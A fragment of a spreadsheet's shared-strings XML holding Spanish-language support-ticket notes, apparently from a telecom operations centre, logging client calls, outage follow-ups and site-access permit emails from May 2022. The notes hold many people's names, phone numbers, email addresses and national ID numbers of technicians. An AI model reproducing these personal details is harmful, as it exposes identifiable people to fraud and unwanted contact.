  </si>
  <si>
    <t>F4569675</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO MARTINEZ AL 78616175 INDICA  QUE EN ESTE MOMENTO REALIZARA EL TRAMITE PARA LOS PERMISOS QUE ES EN UNOS MINUTOS QUE YA SE PUEDEN PRESENTAR LOS TECNICOS**
ID 3001482861
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE SOLICITANDO LOS ACCESOS
DE: JOSE ARTURO CORADO JIMENEZ
ENVIADO: JUEVES, 19 DE MAYO DE 2022 8:30
PARA: MARCO.MARTINEZ@BFA.GOB.SV &lt;MARCO.MARTINEZ@BFA.GOB.SV&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || BANCO DE FOMENTO AGROPECUARIO || IP2146024SV || JUCUAPA BO. EL CENTROCALLE DELGADO9
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS   PARA PERSONAL TÉCNICO CON RESPECTO AL ENLACE CON ID: IP2146024SV UBICADO JUCUAPA      BO. EL CENTROCALLE DELGADO9 ADJUNTO DATOS DE PERSONAL TÉCNICO.
00815933-2 10805 MANUEL GARCIA
04339969-2 10701 HECTOR IVAN
03236741-2 10807 JOSE LUIS RODRIGUEZ
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4569690</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL ID: 3001976898 ATIENDE EDGAR HERNANDEZ, SOLICITA MONITOREO E INDICA QUE LA VALIDACIÓN NO SE DEBE REALIZAR POR EL TT IMBBL003822 YA QUE LAURA QUIEN LO REPORTO LO TIENE INCORRECTO, SOLICITA QUE MAÑANA 20/05/2022 QUE FINALICE EL MONITOREO A LAS 8AM Y SE LE CONTACTE SOLO A LAURA PARA VALIDAR*/*/*/*SE NOTIFICA A GESTORA POR SKYPE Y SE CAMBIA DE ESTADO*/*/*/*</t>
  </si>
  <si>
    <t>F4569692</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE TILDADA RUIZ AL 42200885  SE CONTACTA A CLIENTE SE TRATA DE LOCALIZAR A GESTOR PERO NO SE OBTIENE RESPUESTA || SE NOTIFICA PARA EL SEGUIMIENTO **
ID 3001551920
**</t>
  </si>
  <si>
    <t>-* SE HABLA CON FRANKLIN ORELLANA (CLIENTE) SE LE INFORMA LO INDICADO EN CRONOS ANTERIOES, SOLICITA SE PROCEDA CON LA VISITA TEC A PRIMERA HORA AGE APERTURA A LAS  8:30 HRS -*
-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL  CLIENTE PARA SOLICTIAR PERMISOS DE PERSONAL TECNICO
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 19 DE MAYO DE 2022 15:48
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS || BANCO DE DESARROLLO RURAL, S.A. || 8902262T || AG 1008 || SD1127059
BUENA TARDE
EN SEGUIMIENTO AL TICKET SD1127059, SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
TORRES ESQUIVEL FRANCISCO     DPI: 2456138891901
 BARRIOS PINALES HANS NERY     DPI: 1749410211901
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE FRANKLIN ORELLANA || SE LE BRINDA DETALLES DE FALLA | DAÑO EN FO || ENTERADO DE AVANCES ||</t>
  </si>
  <si>
    <t>SE LLAMA A FRANKLIN ORELLANA 44990369  PARA VALIDAR SI RECIBIERON EL CORREO PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001721057 - 3001722966 - 3001723504</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON LOS DATOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 19 DE MAYO DE 2022 11:21
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; ANIBAL.GONZALEZ@BANRURAL.COM.GT &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || BANCO DE DESARROLLO RURAL, S.A. || 8902262T || AG 1008 || SD1127059
BUEN DÍA
EN SEGUIMIENTO AL TICKET SD1127059, SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
 DIAZ ALDANA WILLIAM EDGARDO 2703302911501
 LOPEZ GARCIA MILTON ANIBAL 23777636719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69697</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JENNY DE ALFARO 77409542, SE LE SOLICITA SU APOYO PARA UBICAR LOS EQUIPOS DE CLARO PERO NO LOS LOGRA UBICAR, SOLICITA VISITA TÉCNICA. 3001510276</t>
  </si>
  <si>
    <t>F4569701</t>
  </si>
  <si>
    <t>SE LE ENVIA CORREO AL CLIENTE Y SE QUEDA A LA ESPERA DE SUS COMENTARIOS.
CASO: SD1124807 ///TRIBUNAL SUPREMO ELECTORAL. ///
ESVIN ANTONIO PAREDES SAMUY
ESTIMADO CLIENTE CON RESPECTO AL CASO REPORTADO SD1124807, SE VALIDA QUE EN LA ANTERIOR VISITA SD1124781, LLEVADA A CABO EL  12/05/2022 SE TUVO PROBLEMAS EN LA PARTE DE CLARO LOS CUALES FUERON SOLVENTADOS, LO QUE SE LES RECOMENDÓ FUE QUE COLOCARAN EN EL SITIO UN UPS PARA EL ROUTER EN QUE LES ENTREGAMOS EL SERVICIO, YA QUE EL TÉCNICO QUE LLEGO A SITIO INDICO QUE LA FLUCTUACIÓN DE ENERGÍA EN EL LUGAR ES BASTANTE VARIANTE Y PUEDE LLEGAR A DAÑAR EL EQUIPO Y SI EN ALGÚN MOMENTO SE DAÑA Y ESTE NO ESTÁ PROTEGIDO, PARA EL CAMBIO YA SE TENDRÍA QUE VER EL TEMA CON EJECUTIVO DE CUENTA, YA QUE COMO REQUISITO MÍNIMO DE INSTALACIÓN SE SOLICITA UN UPS.  POR OTRA PARTE REVISANDO EL SERVICIO EL DIA DE HOY, EL ROUTER LLEVA EL SIGUIENTE TIEMPO DE ACTIVIDAD
SE OBSERVAN LAS LINEAS CONECTADAS
Y NO SE TIENE LOGS RECIENTES DE CAIDAS A NIVEL WAN O LAN.
SOLICITAMOS NOS PUEDAN INDICAR CUAL ES EL EVENTO EN ESPECIFICO QUE ESTAN PRESENTADO AHORA, YA QUE DE LADO DE CLARO DESDE LA FECHA DE LA VISITA NO SE PERCIBEN PROBLEMAS.
SALUDOS.</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE JOSUE CANIZ 41673388 ID: 1001016608 VALIDA SERVICIO OK Y AUTORIZA EL CIERRE DEL TICKET*/*/*/*SE NOTIFICA A GESTOR RENE.MONZON POR SKYPE PARA PROCEDER*/*/*/*</t>
  </si>
  <si>
    <t>F4569702</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE HENRY, QUIEN VALIDA QUE NO HAY LINK DE FIBRA EN IMC, APLICA REINICIO, PERO QUEDA EN EL MISMO ESTADO, POR LO QUE SE COORIDINARA VISITA
3001469416
COLA:
NOMBRE: A: 0050581501796
NÚMERO: 0050581501796
DURACIÓN: 0:07:08
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050581501796
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 08:35:47</t>
  </si>
  <si>
    <t>F4569712</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL RESPONDE PABLO, MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO Y ESTABLE
-ID 3001472869 - 3001477460</t>
  </si>
  <si>
    <t>F4569713</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  PABLO CIFUENTES 55551169 MENCIONA QUE SE DESCONFIGURO UN EQUIPO INTERNO (NO BRINDA DETALLE DEL EQUIPO) POR LO QUE INDICA QUE EL SEGUIMIENTO SERA CON SU PROVEEDOR
-ID 3001628065</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PABLO CIFUENTES 55551169 MENCIONA QUE REALIZARA PRUEBAS POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 3001590574</t>
  </si>
  <si>
    <t>F4569716</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR.  ALEJANDRO OLIVA 56322593 INFORMA QUE NO LLEGA AL ANCHO DE BANDA CONTRATADO, NO SE REALIZARON MAS PRUEBAS YA QUE NO SE TIENE GESTION DEL CPE, INFORMA QUE SU EJECUTIVO DE CUENTA LE COMENTO SOLICITARIA EL APOYO DE PERSONAL TECNICO PARA LA CERTIFICACION DEL ANCHO DE BANDA. ID: 3001490618.</t>
  </si>
  <si>
    <t>F4569717</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE JORGE ANDRES GARCIA-47681385  ||| CLEINTE  ESTA SOLICITANDO PERMISOS ##
3001698804
COLA:
NOMBRE: A: 47681385
NÚMERO: 011 50247681385
DURACIÓN: 0:01:40
ESTADO: CONECTADA
DETALLES: +50247681385
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 11:09:08</t>
  </si>
  <si>
    <t>EN ESPERA DE AUTORIZACION POR EL CLIENTE
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: JUEVES, 19 DE MAYO DE 2022 9:52
PARA: JOAGARCIA@LUMINOVASC.COM &lt;JOAGARCIA@LUMINOVASC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GDN 66434700 || GRUPO UNIPHARM.-
BUEN DÍA ESTIMADO, CON RESPECTO AL E1:
GDN 66434700
GRUPO UNIPHARM.-
KM.18 CARR AL PACIFICO VILLA NUEVA
SOLICITO SU AMABLE APOYO PARA GESTIÓN DE PERMISOS HACIA NUESTROS TÉCNICOS EN SUS INSTALACIONES:
NOMBRE Y DPI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QUEDAMOS ATENTOS A SUS COMENTARIOS, FAVOR CONFIRMAR PERMISOS POR ESTE MEDIO.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>CLIENTE OCNFIRMA PERMISOS VIA LLAMADA  ## SE APERTURA WO ## ID LAMADA 3001698804</t>
  </si>
  <si>
    <t>F4569718</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROY CALDERON 89279267 PARA CONFIRMAR LA DIRECCION
-ID 3001498848
UBICACIÓN:CENTRO PENAL, MOROCELI  POZO 2</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTTE ROY CALDERON COMENTA QUE EL SE COMUNICO CON JULIO DE GEORED, Y MENCIONA QUE YA ESTAN EN SITIO REALIZANDO VALIDACIONES DE LOS EQUIPOS, SE APERTURA FALLA NUEVAMENTE
3001988690
COLA:
NOMBRE: A: 0050489279267
NÚMERO: 0050489279267
DURACIÓN: 0:02:02
ESTADO: CONECTADA
DETALLES: 0050489279267
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 19/05/2022 15:26:18</t>
  </si>
  <si>
    <t>F4569729</t>
  </si>
  <si>
    <t>CLIENTE RODRIGO CABRERA 56395681 INDICA QUE TENÍAN EL E1 CAIDO, SE LE INDICA AL CLIENTE QUE EL E1 SE OBSERVA OPERATIVO. CLIENTE INDICA QUE REALIZARÁ PRUEBAS SOLICITA SE LE LLAME EN 1 HORA. ID DE LLAMADA: 3001565277</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODRIGO CABRERA AL 56395681 INDICA  QUE AHORITA VERIFICARA QUE SE LE LLAME EN 15 MIN NUEVAMENTE **
ID 3001826794
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODRIGO CABRERA AL 56395681 INIDCA QUE ESTAN REALIZANDO PRUEBAS QUE SE LE LLAME EN 30 MIN PARA CONFIRMAR**
ID 3001756905
**</t>
  </si>
  <si>
    <t>F4569730</t>
  </si>
  <si>
    <t>CLIENTE NOS CONFIRMA LLAMADAS ENTRANTES Y SALIENTE,S NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CLAUDIA ESCOBAR 54661878
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4569731</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA CORADO AL 48174652 NO RESPONDE, OPERADORA INDICA QUE NUMERO ESTA FUERA DE SERVICIO|| SE INTENTARA LUEGO **
ID 3001576252
**</t>
  </si>
  <si>
    <t>SE CONTACTA EL CL DANA ADAVILLO DEL 58262230 ID 3001594629 PARA EL SEGUIMIENTO DEL TICKET Y SE VALIDA QUE ESTA EN PC SE LE BRINDA LA INFORMACIÓN Y BRINDA EL CONTACTO 48174662 CON ANA CORADO SE LE LLAMA EN LINEA Y SI ATIENDE ID 3001615539 SE LE BRINDA LA INFORMACIÓN Y SE LE COMENTA QUE SE VA A TRANSFERIR CON EL GESTOR A CARGO. YENSI CALGUA Y SE CONTACTA AL 8126 ID 3001618607 ATIENE Y SE LE BRINDA LA INFORMACIÓN Y SE DEJA EN LINEA CON EL CLIENTE</t>
  </si>
  <si>
    <t>F4569745</t>
  </si>
  <si>
    <t>CRONO MÁS RECIENTE EN FALLA INDICA ENLACE AFECTADO POR FALLA, SE ESCALA CON KEVYN FONSECA/TEAM LEADER, INDICA QUE NOS APOYARA A AVISAR A GESTOR ASIGNADO.</t>
  </si>
  <si>
    <t>F4569747</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARMANDO CALERO 78424290 MENCIONA QUE ESTARA ESCALANDO EL CASO CON SU PROVEEDOR DE LA PBX
NOTA: CLIENTE INDICA SE PROCEDA CON EL CIERRE
-ID 3001613685</t>
  </si>
  <si>
    <t>F4569754</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FRANCISCO ULLOA-78242588  ##ENVIA DIRECTO A BUZON ## SE INTENTARA LUEGO ## SERVICIO UP ##
3001490822
COLA:
NOMBRE: A: 0050378242588
NÚMERO: 0050378242588
DURACIÓN: 0:00:22
ESTADO: MARCANDO
DETALLES: 0050378242588
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 08:51:25
3001491003
COLA:
NOMBRE: A: 0050378242588
NÚMERO: 0050378242588
DURACIÓN: 0:00:01
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378242588
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 08:52:29
3001491764
COLA:
NOMBRE: A: 0050378242588
NÚMERO: 0050378242588
DURACIÓN: 0:00:12
ESTADO: MARCANDO
DETALLES: 0050378242588
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 08:52:38</t>
  </si>
  <si>
    <t>F4569756</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE HENRY VERGANZA, PROPORCIONA EL CONTACTO DE LA FISCALIA EN SAN JERONIMO BAJA VERAPAZ 30167645 EDWARD ALVIZUREZ , SE PROCEDE A CONTACTAR
3001510278
COLA:
NOMBRE: A: 30192528
NÚMERO: 30192528
DURACIÓN: 0:06:45
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 30192528
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 09:14:44</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A  CLIENTE HENRY VERGANZA, INDICA QUE TANTO JULIO  CARDONA COMO SU PERSONA SON TECNICOS DE CHIMALTENANGO Y NO DE SAN JERÓNIMO BAJA VERAPAZ, POR LO QUE BUSCARA  EL CONTACTO DEL TECNCO QUE CORRESPONDE
3001510278
COLA:
NOMBRE: A: 30192528
NÚMERO: 30192528
DURACIÓN: 0:03:23
ESTADO: CONECTADA
DETALLES: 30192528
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 09:11:19</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE EDWARD ALVIZUREZ, MENCIONA QUE EN ESTE MOMENTO EL SERVICIO SE ENCUENTRA OPERATIVO Y AUTORIZA CIERRE DE TICKET.
3001518683
COLA:
NOMBRE: A: 30167645
NÚMERO: 30167645
DURACIÓN: 0:02:15
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 30167645
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 09:18:51</t>
  </si>
  <si>
    <t>F4569759</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FRANCISCO ULLOA 78242588, CLIENTE INDICA QUE EL DÍA DE AYER ESTABA PRESENTANDO INCONVENIENTE CON INTERFERENCIA EN SUS LLAMADAS, INDICA QUE REPORTÓ 4 E1. SE LE COMENTA QUE EL INCONVENIENTE SE SOLVENTÓ EN HORAS DE LA TARDE POR LO QUE YA NO DEBERÍA DAR ESE PROBLEMA, SE LE SOLICITA AL CLIENTE REALIZAR PRUEBAS DE LLAMADAS EL DÍA DE HOY PARA VALIDAR SI PERSISTE. SOLICITA SE LE LLAME A LAS 11 AM PARA VALIDAR.
ID DE LLAMADA: 3001570038</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FRANCISCO ULLOA 78242588 VALIDA EL SERVICIO Y SE PROCEDE AL CIERRE DEL CASO. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4569761</t>
  </si>
  <si>
    <t>F4569763</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEREN SANDOVAL 59459804 NO ERSPONDE, SE INTENTARA LUEGO
-ID 3001542228</t>
  </si>
  <si>
    <t>F4569770</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUDWIN CASTELLANOS 59338422 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001545933</t>
  </si>
  <si>
    <t>F4569772</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE URIEL RAMIREZ 44895331 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMADA EN 5 MIN
-ID 3001518831</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE URIEL RAMIREZ 44895331 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001530574</t>
  </si>
  <si>
    <t>F4569773</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JONY BARRERA AL 59740928 INDICA QUE NO ESTA EN OFICINA SOLICITA QUE SE LE LLAME EN 20 MIN**
ID 3001725925</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JONY BARRERA AL 59740928 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO *
ID 3001814697
**</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE  JONY BARRERA 59740928 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001551648</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JONY BARRERA AL 59740928 INDICA QUE NO ESTA EN OFICINA SOLICITA QUE SE LE LLAME EN 20 MIN**
ID 3001725925
**</t>
  </si>
  <si>
    <t>F4569774</t>
  </si>
  <si>
    <t>SE LLAMA EN DOS OCACIONES CONTESTA PBX BANRURAL EXTENSION 089021 , SIN RESPUESTA, SE LLAMO A PBX BANRURAL 2504-1501  CONTESTA DANIELA, SE LE SOLICITA TRANSFERIR LLAMADA HACIA AGENCIA SIN EMBARGO INDICA QUE NO SE LOGRA LA COMUNICACIÓN, SE LLAMARA MAS ADELANTE.
1001715587
COLA:
1001715965
COLA:
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:04:39
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 23/05/2022 15:07:52
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:01:03
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 23/05/2022 15:03:07</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE REPORTANDO INCIDENTE Y SOLITANDO CONTACTOS EN PUNTO REMOTO.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 20:35PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE REDUNDANTE CAIDO PARA CLIENTE "CC_BANRURAL_GT_AGENCIA_890"
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL ENLACE REDUNDANTE CON ID "8902207T ",  ACTUALMENTE LA AGENCIA SE ENCUENTRA OPERANDO A NIVEL DE RED POR MEDIO DEL ENLACE PRINCIPAL SIN EMBARGO ES NECESARIO RESTABLECER EL ENLACE SECUNDARIO, POR LO CUAL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SE ADJUNTA ESTADO DEL ENLACE REDUNDANTE.
TICKET: F4569774
ID: 8902207T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_890
UBICADO EN: AGENCIA 890 1RA. CALLE 4A AVE, ESQUINA ZONA 1 (MUNICIPALIDAD IZTAPA) ESCUINTLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4569775</t>
  </si>
  <si>
    <t>SE LLAMA A CLENTE ANA RIVAS 94890031 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001522842 - 3001525643</t>
  </si>
  <si>
    <t>F4569784</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SOFIA  33403390 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001598696</t>
  </si>
  <si>
    <t>F4569785</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS NAVARRO 51552078 MENCIONA QUE NO ES EL ENCARGADO PERO AMABLEMENTE AYUDA A VALIDAR, MENCIONA QUE OBSERVA EL SERVICIO CAIDO POR LO QUE BRINDA CONTACTO DE PR SELVIN - 49872286
-ID 3001706876</t>
  </si>
  <si>
    <t>SE CONTACTA NUEVAMENTE CON SELVIN AL 49872286 ID 3001976470 Y COMENTA QUE NO HAY NADIE MAS Y QUE SE ESTAN VIENDO AFECTADOS POR FALTA DE ENERGÍA POR LO QUE SE PUEDE PROCEDER CON EL CIERRE DE LA FALLA PENDIENTE CIERRE DE TICKET CON LA SD.  SE NOTIFICA AL GESTOR SAMUEL.ESTRADAG VÍA SKYPE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN - 49872286 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001711003</t>
  </si>
  <si>
    <t>F4569788</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES  AL 45787911 COFIRMA SERVICIO ESTABLE Y OPERATIVO **
AUTORIZA CIERRE DE TICKET **
ID 3001525561
**</t>
  </si>
  <si>
    <t>F4569789</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELVIN SAY 54891453 MENCIONA QUEVALIDARA CON PR PERO SE CORTA LA LLAMADA, SE INTEENTARA EN 10 MIN
-ID 3001727333</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE GABRIELA ALEJANDRA - 54390451 MENCIONA QUE YA RESTABLECIO EL SERVICIO LUEGO DEL REINICIO
-ID 3001752270
&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING -C 1000 -S 1000 -M 15 -BRIEF -VPN-INSTANCE MP_TELEF 10.174.189.244
  PING 10.174.189.244: 1000  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.174.189.244 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/19 MS
&lt;QTZLGTLFN2T1E03A02EIM3&gt;</t>
  </si>
  <si>
